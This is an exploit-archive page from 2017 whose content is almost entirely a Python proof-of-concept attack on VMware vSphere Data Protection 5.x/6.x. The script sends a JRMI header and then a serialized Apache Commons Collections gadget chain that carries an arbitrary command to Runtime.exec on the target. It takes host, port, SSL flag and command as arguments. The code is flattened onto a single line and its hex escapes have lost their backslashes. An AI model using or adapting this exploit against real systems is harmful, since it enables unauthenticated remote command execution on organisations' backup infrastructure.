Home / os / winmobile

VMware vSphere Data Protection 5.x / 6.x Java Deserialization

Posted on 13 June 2017

#!/usr/bin/env python import socket import sys import ssl def getHeader(): return 'x4ax52x4dx49x00x02x4b' def payload(): cmd = sys.argv[4] cmdlen = len(cmd) data2 = 'x00x09x31x32x37x2ex30x2ex31x2ex31x00x00x00x00x50xacxedx00x05x77x22x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x44x15x4dxc9xd4xe6x3bxdfx74x00x05x70x77x6ex65x64x73x7dx00x00x00x01x00x0fx6ax61x76x61x2ex72x6dx69x2ex52x65x6dx6fx74x65x70x78x72x00x17x6ax61x76x61x2ex6cx61x6ex67x2ex72x65x66x6cx65x63x74x2ex50x72x6fx78x79xe1x27xdax20xccx10x43xcbx02x00x01x4cx00x01x68x74x00x25x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx70x78x70x73x72x00x32x73x75x6ex2ex72x65x66x6cx65x63x74x2ex61x6ex6ex6fx74x61x74x69x6fx6ex2ex41x6ex6ex6fx74x61x74x69x6fx6ex49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x55xcaxf5x0fx15xcbx7exa5x02x00x02x4cx00x0cx6dx65x6dx62x65x72x56x61x6cx75x65x73x74x00x0fx4cx6ax61x76x61x2fx75x74x69x6cx2fx4dx61x70x3bx4cx00x04x74x79x70x65x74x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx70x78x70x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x70x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x71x00x7ex00x00x73x71x00x7ex00x05x73x7dx00x00x00x01x00x0dx6ax61x76x61x2ex75x74x69x6cx2ex4dx61x70x70x78x71x00x7ex00x02x73x71x00x7ex00x05x73x72x00x2ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex6dx61x70x2ex4cx61x7ax79x4dx61x70x6exe5x94x82x9ex79x10x94x03x00x01x4cx00x07x66x61x63x74x6fx72x79x74x00x2cx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx70x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x68x61x69x6ex65x64x54x72x61x6ex73x66x6fx72x6dx65x72x30xc7x97xecx28x7ax97x04x02x00x01x5bx00x0dx69x54x72x61x6ex73x66x6fx72x6dx65x72x73x74x00x2dx5bx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx70x78x70x75x72x00x2dx5bx4cx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex54x72x61x6ex73x66x6fx72x6dx65x72x3bxbdx56x2axf1xd8x34x18x99x02x00x00x70x78x70x00x00x00x05x73x72x00x3bx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x6fx6ex73x74x61x6ex74x54x72x61x6ex73x66x6fx72x6dx65x72x58x76x90x11x41x02xb1x94x02x00x01x4cx00x09x69x43x6fx6ex73x74x61x6ex74x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx70x78x70x76x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex52x75x6ex74x69x6dx65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex49x6ex76x6fx6bx65x72x54x72x61x6ex73x66x6fx72x6dx65x72x87xe8xffx6bx7bx7cxcex38x02x00x03x5bx00x05x69x41x72x67x73x74x00x13x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx4cx00x0bx69x4dx65x74x68x6fx64x4ex61x6dx65x74x00x12x4cx6ax61x76x61x2fx6cx data2 += 'x00' + chr(cmdlen) data2 += cmd data2 += 'x74x00x04x65x78x65x63x75x71x00x7ex00x24x00x00x00x01x71x00x7ex00x29x73x71x00x7ex00x17x73x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75x65x70x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4ex75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00x70x78x70x00x00x00x01x73x71x00x7ex00x09x3fx40x00x00x00x00x00x10x77x08x00x00x00x10x00x00x00x00x78x78x76x72x00x12x6ax61x76x61x2ex6cx61x6ex67x2ex4fx76x65x72x72x69x64x65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x71x00x7ex00x3fx78x71x00x7ex00x3f' return data2 def sslMode(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL") def exploitTarget(sock): server_address = (sys.argv[1], int(sys.argv[2])) print 'connecting to %s port %s' % server_address sock.connect(server_address) print 'sending exploit headers ' sock.send(getHeader()) sock.recv(8192) print 'sending exploit ' sock.send(payload()) sock.close() print 'exploit completed.' if __name__ == "__main__": if len(sys.argv) != 5: print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd' print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"' sys.exit(0) else: sock = None if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True: sock = sslMode() if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) exploitTarget(sock)

 

TOP